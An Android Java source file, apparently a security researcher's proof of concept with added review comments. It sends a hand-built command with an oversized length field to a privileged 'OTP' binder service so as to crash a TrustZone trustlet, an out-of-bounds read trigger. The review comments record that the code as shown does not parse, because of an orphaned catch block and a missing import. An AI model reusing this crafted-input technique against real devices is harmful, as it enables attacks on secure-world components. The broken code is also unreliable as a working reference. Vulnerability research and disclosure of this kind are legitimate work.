package com.example.laginimaineb.otp;
|
|
import android.os.IBinder;
|
import android.os.Parcel;
|
import android.os.RemoteException;
|
import android.support.v7.app.AppCompatActivity;
|
import android.os.Bundle;
|
import android.util.Log;
|
|
/**
 * Test activity that, in {@link #onCreate}, looks up the binder service registered
 * under {@link #INTERFACE_DESCRIPTOR} through reflection on the hidden
 * {@code android.os.ServiceManager} API, sends it one hand-built command whose
 * embedded length field does not match the bytes actually supplied, and logs the
 * integer reply. Nothing is shown in the UI beyond {@code R.layout.activity_main}.
 *
 * <p>NOTE(review): read together with the comments below, this presumably probes
 * whether the receiving side validates a length field taken from the command
 * buffer against the payload it really received. That check belongs in the
 * service that parses the command; this class only demonstrates the symptom.
 *
 * <p>NOTE(review): as shown, the source does not parse — the brace on the line
 * before {@code catch (RemoteException ex)} has no matching {@code try}, and
 * {@code InvocationTargetException} is referenced without an import of
 * {@code java.lang.reflect.InvocationTargetException}. Presumably an inner
 * {@code try} around the binder transaction was lost in transcription; confirm
 * against the original before relying on the control flow described here.
 */
public class OneWhoKNOX extends AppCompatActivity {

    /**
     * The logtag used.
     */
    private static final String LOGTAG = "OTP_TEST";

    /**
     * The name of the OTP binder service.
     * Used both as the {@code ServiceManager.getService} lookup key and as the
     * interface token written into the request parcel.
     */
    private static final String INTERFACE_DESCRIPTOR = "OTP";

    /**
     * Builds and sends the test command as soon as the activity is created.
     *
     * <p>Sequence: resolve {@code ServiceManager.getService(String)} reflectively,
     * obtain the {@link IBinder} for {@link #INTERFACE_DESCRIPTOR}, fill a 0xDA7
     * (3495) byte buffer with a command id at offset 0 and a length field at offset
     * 0x41C (1052), write it as a byte array behind the interface token, and issue
     * {@code transact} with code 2. The first {@code int} of the reply is logged.
     *
     * <p>NOTE(review): both parcels are recycled only on the success path; if
     * {@code transact} throws {@link RemoteException} they are never returned to
     * the pool. A {@code finally} block (or recycling before logging) would close
     * that leak.
     *
     * <p>NOTE(review): {@code smClass} is a raw {@code Class}; {@code Class<?>}
     * expresses the same thing without an unchecked warning.
     *
     * @param savedInstanceState forwarded unchanged to the superclass; not read here
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        try {
            //Getting the binder
            // ServiceManager is not part of the public SDK, hence the reflective lookup.
            Class smClass = Class.forName("android.os.ServiceManager");
            IBinder binder = (IBinder) smClass.getMethod("getService", String.class).invoke(null, INTERFACE_DESCRIPTOR);

            //Writing a command with a large length field
            Parcel parcel = Parcel.obtain();
            Parcel reply = Parcel.obtain();
            parcel.writeInterfaceToken(INTERFACE_DESCRIPTOR);
            // Buffer is zero-initialised; only the two fields below are set explicitly.
            byte[] command = new byte[0xDA7];

            //Setting the command to OTP_GENERATE_OTP
            // Little-endian 32-bit value 2 at offset 0 (the name comes from the original author's comment).
            command[0] = 0x02;
            command[1] = 0x00;
            command[2] = 0x00;
            command[3] = 0x00;

            //Setting the length field to something insane
            // Little-endian 0x0000FFFF (65535) at offset 0x41C — far larger than the
            // 0xDA7 bytes actually sent, so a receiver that trusts this field without
            // checking it against the real payload size reads past the buffer.
            command[0x41C] = (byte)0xFF;
            command[0x41C + 1] = (byte)0xFF;
            command[0x41C + 2] = (byte)0x00;
            command[0x41C + 3] = (byte)0x00;

            //Sending the command (should crash the trustlet)
            parcel.writeByteArray(command);
            // Transaction code 2; flags 0 means a normal (non-oneway) call that waits for the reply.
            binder.transact(2, parcel, reply, 0);
            Log.e(LOGTAG, "res=" + reply.readInt());
            // Not reached if transact throws — see the leak note in the method Javadoc.
            reply.recycle();
            parcel.recycle();

        } catch (ClassNotFoundException |
                NoSuchMethodException |
                IllegalAccessException |
                InvocationTargetException ex) {
            // Any failure of the reflective ServiceManager lookup ends up here.
            Log.e(LOGTAG, "Failed to dynamically load ServiceManager methods", ex);
        }

    } catch (RemoteException ex) {
        // Thrown by binder.transact when the remote side cannot be reached or dies
        // during the call. NOTE(review): the enclosing try for this catch is not
        // visible in the source as shown — see the class Javadoc.
        Log.e(LOGTAG, "Failed to communicate with remote binder", ex);
    }
    }
}
|
|